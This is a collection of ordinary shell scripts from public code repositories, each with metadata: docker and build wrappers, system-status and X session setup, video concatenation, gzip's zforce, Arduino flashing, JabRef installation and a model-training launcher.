giuseppemorelli/docker-devbox
|
/local/bin/phpcs.sh
|
UTF-8
| 232
| 2.53125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
DOCKER_COMPOSE_DIR=${SCRIPTDIR}/../
cd "$DOCKER_COMPOSE_DIR" || exit
docker-compose exec -T -u $UID web /var/www/html/project/vendor/bin/phpcs "$@"
| true
|
61b472b08a1ca0afe465456bcff7267294fb2b9a
|
Shell
|
vijayrajah/scripts
|
/sysinfo/get_system_status.sh
|
UTF-8
| 787
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
##Autor: vijay Rajah
##me@rvijay.in
env() {
#declare -a CMDS
CMDS='uptime
uname -a
date
w
ps aux
df -h
ifconfig -a
iptables -L --line-numbers -v -n
iptables -L --line-numbers -v -n -t nat
pstree -pau
ntpdate -q -u pool.ntp.org
cat /proc/user_beancounters
lsof'
DT=`date +%Y-%m-%d_%Hh%Mm%Ss`
PATH="/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin"
OUT_DIR=/apps/apps-backup
OUT_FILE=${OUT_DIR}/STAT-${DT}.out
IFS='
'
}
do_stats() {
for CMD in $CMDS
do
echo "############################################ ${CMD} ############################################" >> ${OUT_FILE}
eval ${CMD} >> ${OUT_FILE} 2>&1
echo "################################################################################################
" >> ${OUT_FILE}
done
}
env
do_stats
| true
|
89439bce5dc4101a2906adac3977f649048fa794
|
Shell
|
voutilad/dotfiles-1
|
/.xsession
|
UTF-8
| 1,523
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/sh -x
cleanup() {
echo "cleaning up"
pkill -9 dzen2 i3status dbus-daemon redshift
rm -f ~/.Xauthority
}
trap cleanup INT TERM QUIT
export LANG=en_US.UTF-8
export MOZ_USE_XINPUT2=1
SCREEN_WIDTH=`xrandr 2>&1 | grep "Screen 0: minimum" | sed -e 's/.*, current //' -e 's/ x.*//'`
if [ "${SCREEN_WIDTH}" -gt 2000 ]; then
export HIDPI=1
echo "using HIDPI"
fi
if [ "$HIDPI" = "1" ]; then
xrdb -DHIDPI=1 < ~/.Xdefaults
else
xrdb < ~/.Xdefaults
fi
MACHINE="`sysctl -n hw.vendor` `sysctl -n hw.product`"
if [ `uname -s` == "OpenBSD" ]; then
eval `dbus-launch --sh-syntax`
ruby ~/code/dzen-jcs/dzen-jcs.rb &
xmodmap ~/.xmodmap
xset b off
xset r rate 350 35
xset m 3/1 4
# disable built-in saver, because xidle will handle it
xset s off
# disable dpms, because slock will handle it
xset dpms 0 0 0
xidle -timeout 500 -ne -program ~/bin/lock &
xsetroot -solid '#6c7c87' -cursor_name left_ptr
redshift -l 41.90:-87.66 -t 6500:3500 -m randr:preserve=1 &
xbanish &
case $MACHINE in
"LENOVO 20HRCTO1WW")
xcalib ~/.icc/x1c5wqhd-LP140QH2_SPB1.icc
xdimmer -k -t 20 -n &
synclient \
PalmDetect=1 \
PalmMinWidth=8 \
ClickPad=1 \
;
;;
"HUAWEI HUAWEI MateBook X")
xcalib ~/.icc/matebookx.icc
xdimmer -n -a &
;;
*)
echo "running on unknown machine \"${MACHINE}\""
;;
esac
/usr/local/bin/ratpoison
else
xset +fp ~/.fontspcf fp rehash
xset b off
/usr/local/bin/xbanish &
xsetroot -cursor_name left_ptr
/usr/local/bin/ratpoison -f ~/.ratpoisonrc.mac
fi
cleanup
| true
|
5f2dd1ce3f254c62ca33447cc6b5b9b7d826ccf6
|
Shell
|
AnwarAsif/vimrc
|
/install_basic.sh
|
UTF-8
| 221
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/sh
set -e # exit in case of any error
cd ~/.rcasif
cp ~/.vimrc ~/.vimrc_bk
cat ~/.rcasif/basicrc > ~/.vimrc
echo "My basic RC file is loaded in to ~./.vimrc file"
echo "Previous vimrc is save to ~/.vimrc_bk file"
| true
|
17d1e02df9874f7d2cd7afa565ef7dd7853133da
|
Shell
|
jschauma/photoscripts
|
/combine-videos
|
UTF-8
| 285
| 3.171875
| 3
|
[] |
no_license
|
#! /bin/sh
n=0
filter=""
iflags=""
for i in $@; do
iflags="${iflags} -i ${i}"
filter="${filter}${filter:+ }[${n}:0] [${n}:1]"
n=$(( ${n} + 1 ))
done
eval ffmpeg ${iflags} \
-filter_complex \'${filter} concat=n=${n}:v=1:a=1 [v] [a]\' \
-map '[v]' -map '[a]' combined.mov
| true
|
ee3fcac23a82f951aa10976d0e1cefde052a9fea
|
Shell
|
fuzzm/fuzzm-project
|
/benchmarks/LAVA-M/md5sum/binbackup/zforce
|
UTF-8
| 2,104
| 3.890625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# zforce: force a gz extension on all gzip files so that gzip will not
# compress them twice.
#
# This can be useful for files with names truncated after a file transfer.
# 12345678901234 is renamed to 12345678901.gz
# Copyright (C) 2002, 2007, 2010 Free Software Foundation
# Copyright (C) 1993 Jean-loup Gailly
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
bindir='/bin'
case $1 in
--__bindir) bindir=${2?}; shift; shift;;
esac
PATH=$bindir:$PATH; export PATH
version="zforce (gzip) 1.5
Copyright (C) 2010-2012 Free Software Foundation, Inc.
This is free software. You may redistribute copies of it under the terms of
the GNU General Public License <http://www.gnu.org/licenses/gpl.html>.
There is NO WARRANTY, to the extent permitted by law.
Written by Jean-loup Gailly."
usage="Usage: $0 [FILE]...
Force a .gz extension on all compressed FILEs so that gzip will
not compress them twice.
Report bugs to <bug-gzip@gnu.org>."
if test $# = 0; then
echo >&2 "$0: invalid number of operands; try \`$0 --help' for help"
exit 1
fi
res=0
for i do
case "$i" in
--h*) exec echo "$usage";;
--v*) exec echo "$version";;
*[-.]z | *[-.]gz | *.t[ag]z) continue;;
esac
if test ! -f "$i" ; then
echo zforce: $i not a file
res=1
continue
fi
if gzip -lv < "$i" 2>/dev/null | grep '^defl' > /dev/null; then
new="$i.gz"
if mv "$i" "$new"; then
echo $i -- replaced with $new
else
res=$?
fi
fi
done
exit $res
| true
|
e03a39b6a9c3cd0d896f9ce7fa1243f0db88816a
|
Shell
|
trevora/dotfiles
|
/packages
|
UTF-8
| 486
| 3.1875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -e
CONFIG="packages.conf.yaml"
DOTBOT_DIR="dotbot"
APTGET_DIR="dotbot_plugin_aptget"
DOTBOT_BIN="bin/dotbot"
APTGET_PLUGIN="aptget.py"
BASEDIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
cd "${BASEDIR}"
git submodule update --init --recursive "${DOTBOT_DIR}"
git submodule update --init --recursive "${APTGET_DIR}"
"${BASEDIR}/${DOTBOT_DIR}/${DOTBOT_BIN}" -d "${BASEDIR}" -c "${BASEDIR}/${CONFIG}" -p "${BASEDIR}/${APTGET_DIR}/${APTGET_PLUGIN}" "${@}"
| true
|
243088c32bf9ec385c22f044b71146ba2184b777
|
Shell
|
guillon/docker-qemu-tutorial
|
/entrypoint.sh
|
UTF-8
| 470
| 3.375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -euo pipefail
if [ $# -gt 0 ] && [ "$1" != "--" ]; then
exec "$@"
fi
cd /home/hacker
[ -d qemu-tutorial ] || cp -a /qemu-tutorial qemu-tutorial
echo ""
echo " Welcome to the JCF11 QEMU Tutorial"
echo ""
echo " You're running bash into a Ubuntu 14.04 container as user 'hacker'."
echo ""
echo " You may check your install with:"
echo " > check-install.sh"
echo " which should dump a binary search call trace."
echo ""
exec bash
| true
|
5d65c796e7bd0d26a361be7379a29d85243996be
|
Shell
|
vejmelkam/fmda_scraper
|
/retrieve_observations.sh
|
UTF-8
| 328
| 3.75
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
if [ $# -ne 2 ]; then
echo "usage: retrieve_observations.sh <station-list> <timestamp>"
echo " <timestamp> must be formatted as YYYY-MM-DD_HH:mmm"
exit 2
fi
STATIONS=`grep -v "^#" $1`
for S in $STATIONS ;
do
echo "Processing $S ..."
python scrape_station.py -c $S -i 24 -t $2 dl
done
| true
|
a8cca5935f237703d7f987bd91fd3ee64842f9a2
|
Shell
|
onebytegone/arduino-blink
|
/bin/flash.sh
|
UTF-8
| 560
| 3.796875
| 4
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Usage: ./bin/flash.sh ${PORT}
set -e
TARGET_PORT=$1
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
if [ -z "${TARGET_PORT}" ]; then
echo "ERROR: A port must be provided e.g. ./bin/flash.sh /dev/tty.usbmodem123"
echo
echo "Known ports:"
ls -1 /dev/tty.*
exit 1
fi
source "${SCRIPT_DIR}/../project-vars.sh"
HEX_FILE="src/${PROJECT_NAME}.hex"
echo "Flashing ${HEX_FILE} to ${TARGET_PORT}..."
avrdude -F -V -c arduino -p atmega328p -P "${TARGET_PORT}" -b 115200 -U "flash:w:${HEX_FILE}"
| true
|
419fb275396a9a2b33072ff7de702b98bce66633
|
Shell
|
rit-git/tagging
|
/appendix/albert/albert.sh
|
UTF-8
| 808
| 2.625
| 3
|
[
"Apache-2.0"
] |
permissive
|
CUDA=3
mkdir log
for dataset in "SUGG"
do
DATA_DIR="/home/ubuntu/users/jinfeng/tagging/data/${dataset}"
MODEL_DIR="./model/${dataset}/seed_${rand_seed}"
LOG_FILE_PATH="./log/albert.log"
echo "" >> ${LOG_FILE_PATH}
SEED=1000
CUDA_VISIBLE_DEVICES=${CUDA} python ../../model/transformer.py \
--model_type albert \
--model_name_or_path albert-base-v1 \
--task_name SST-2 \
--do_train \
--do_lower_case \
--data_dir $DATA_DIR \
--max_seq_length 128 \
--per_gpu_eval_batch_size=32 \
--per_gpu_train_batch_size=32 \
--learning_rate 2e-5 \
--num_train_epochs 3.0 \
--output_dir $MODEL_DIR \
--log_file_path $LOG_FILE_PATH \
--save_snapshots 1 \
--seed ${SEED}
done
| true
|
2eb28008b69e4fd0115bd2018c9a50c61987fb98
|
Shell
|
skulumani/system_setup
|
/build_scripts/setup_jabref.sh
|
UTF-8
| 1,111
| 3.703125
| 4
|
[] |
no_license
|
# Download and setup JabRef into ~/
JABREF_VERSION="5.1"
JABREF_FNAME="JabRef-${JABREF_VERSION}-portable_linux.tar.gz"
JABREF_LINK="https://builds.jabref.org/master/${JABREF_FNAME}"
JABREF_DIR="$HOME/JabRef"
WORK_DIR=$(mktemp -d)
# make sure tmp dir was actually created
if [[ ! -d "$WORK_DIR" ]]; then
echo "Could not create temp directory"
exit 1
fi
# delete temp dir
cleanup () {
rm -rf "$WORK_DIR"
echo "Deleted temp working directory: $WORK_DIR"
}
# trap cleanup EXIT
# test to see if Jabref directory exists
if [[ ! -d "${JABREF_DIR}" ]]; then
echo "Creating ${JABREF_DIR}"
mkdir -p ${JABREF_DIR}
else
echo "${JABREF_DIR} already exists"
fi
echo "Downloading ${JABREF_FNAME}"
wget ${JABREF_LINK} -O ${WORK_DIR}/${JABREF_FNAME}
# untar it
cd $WORK_DIR
tar -xvzf ${JABREF_FNAME}
mv ./JabRef/bin ${JABREF_DIR}
mv ./JabRef/lib ${JABREF_DIR}
# echo "Install Oracle JAVA"
# sudo add-apt-repository ppa:webupd8team/java
# sudo apt-get update
# sudo apt-get install oracle-java8-installer
# setup links for Jabref icon/menu item
# should be setup by the dotfiles installer
| true
|
e144758c69f9b13db577037b769a9ec37f4e68fb
|
Shell
|
SimpleValue/sv.gcloud.docker.clj-app
|
/run.sh
|
UTF-8
| 222
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
if [ ! -n "$CONFIG" ]
then
echo "Env variable CONFIG with edn config for app is missing"
exit 1
fi
if [ -n "$UBERJAR" ]
then
gsutil cp -n "$UBERJAR" uberjar.jar
fi
java -jar uberjar.jar "$CONFIG"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.